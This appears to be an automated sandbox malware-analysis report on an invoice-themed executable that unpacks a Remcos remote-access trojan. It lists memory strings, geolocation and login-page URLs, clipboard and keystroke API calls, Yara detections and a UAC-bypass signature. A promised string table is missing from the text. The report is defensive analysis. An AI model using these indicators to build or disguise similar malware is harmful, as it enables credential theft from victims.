Source: turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: bhv7BD7.tmp.5.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv7BD7.tmp.5.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv7BD7.tmp.5.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv7BD7.tmp.5.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv7BD7.tmp.5.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv7BD7.tmp.5.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                    Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3758634982.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1364321509.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1364486252.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1384020768.0000000001520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: turbinals.exe, 00000003.00000002.3758634982.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1364321509.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1364486252.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1384020768.0000000001520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp$
                    Source: turbinals.exe, 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, turbinals.exe, 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, turbinals.exe, 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, turbinals.exe, 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, turbinals.exe, 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, turbinals.exe, 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: turbinals.exe, 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                    Source: turbinals.exe, 00000003.00000002.3758634982.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1364321509.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1364486252.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1384020768.0000000001520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl6
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0:
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0H
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0I
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0Q
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://ocsp.msocsp.com0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://ocsp.msocsp.com0S
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0~
                    Source: turbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: turbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371634572.000000000173D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: turbinals.exe, 00000007.00000002.1371634572.000000000173D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.coma
                    Source: turbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: turbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696501260359
                    Source: turbinals.exe, 00000005.00000002.1381486653.0000000000BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?82954a9491e844512441fcdc
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?8595da0e88f921ab00454191
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5b&FrontEnd=AF
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?ae1e93c052690ba0623cc864d4ad8ff9
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?d3f78c2c20f92f3d0890e3edc77b84b9
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: turbinals.exe, 00000005.00000003.1380996755.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000005.00000003.1381105492.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000005.00000003.1381015586.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000005.00000002.1382093472.0000000002AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033__
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-10-25-17/PreSignInSettingsConfig.json
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-10-25-17/PreSignInSettingsConfig.json?One
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=60046d
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: turbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://www.office.com/
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F44164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00F44164
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D54164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00D54164
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F43F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F43F66
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F3001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00F3001C
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F5CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F5CABC
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D6CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00D6CABC
                    Source: Yara match | File source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 7720, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 7744, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 8108, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 8124, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 8144, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 4984, type: MEMORYSTR

                    E-Banking Fraud

                    Source: Yara match | File source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000003.00000002.3760192225.000000000169F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.3758537352.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.3760107455.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.3761526456.000000000402F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.1465257785.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 7720, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 7744, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 8108, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 8124, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 8144, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 4984, type: MEMORYSTR
                    Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    System Summary

                    Matched rules (each UNPACKEDPE and MEMORY source listed below matched all three):
                    Windows_Trojan_Remcos_b296e965, Author: unknown
                    REMCOS_RAT_variants, Author: unknown
                    Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
                    Source, type: UNPACKEDPE:
                    13.2.turbinals.exe.400000.0.raw.unpack
                    10.2.turbinals.exe.ec0000.1.unpack
                    13.2.turbinals.exe.400000.0.unpack
                    3.2.turbinals.exe.3bb0000.2.raw.unpack
                    3.2.turbinals.exe.3bb0000.2.unpack
                    13.2.turbinals.exe.3180000.2.unpack
                    2.2.turbinals.exe.3490000.1.unpack
                    3.2.turbinals.exe.400000.0.raw.unpack
                    9.2.turbinals.exe.1d00000.1.unpack
                    9.2.turbinals.exe.1d00000.1.raw.unpack
                    3.2.turbinals.exe.400000.0.unpack
                    13.2.turbinals.exe.3180000.2.raw.unpack
                    11.2.turbinals.exe.35d0000.1.raw.unpack
                    10.2.turbinals.exe.ec0000.1.raw.unpack
                    2.2.turbinals.exe.3490000.1.raw.unpack
                    11.2.turbinals.exe.35d0000.1.unpack
                    Source, type: MEMORY:
                    0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp
                    0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp
                    00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp
                    0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp
                    00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp
                    00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp
                    00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp
                    0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp
                    Source, type: MEMORYSTR (matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown):
                    Process Memory Space: turbinals.exe PID: 7720
                    Process Memory Space: turbinals.exe PID: 7744
                    Process Memory Space: turbinals.exe PID: 8108
                    Process Memory Space: turbinals.exe PID: 8124
                    Process Memory Space: turbinals.exe PID: 8144
                    Process Memory Space: turbinals.exe PID: 4984
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00ED3B3A: This is a third-party compiled AutoIt script.
                    Source: z49FACTURA-0987678.exe, string found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: z49FACTURA-0987678.exe, 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp, strings found in binary or memory: the AutoIt marker "This is a third-party compiled AutoIt script." and the AutoIt3 runtime string table reproduced once below
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00CE3B3A: This is a third-party compiled AutoIt script.
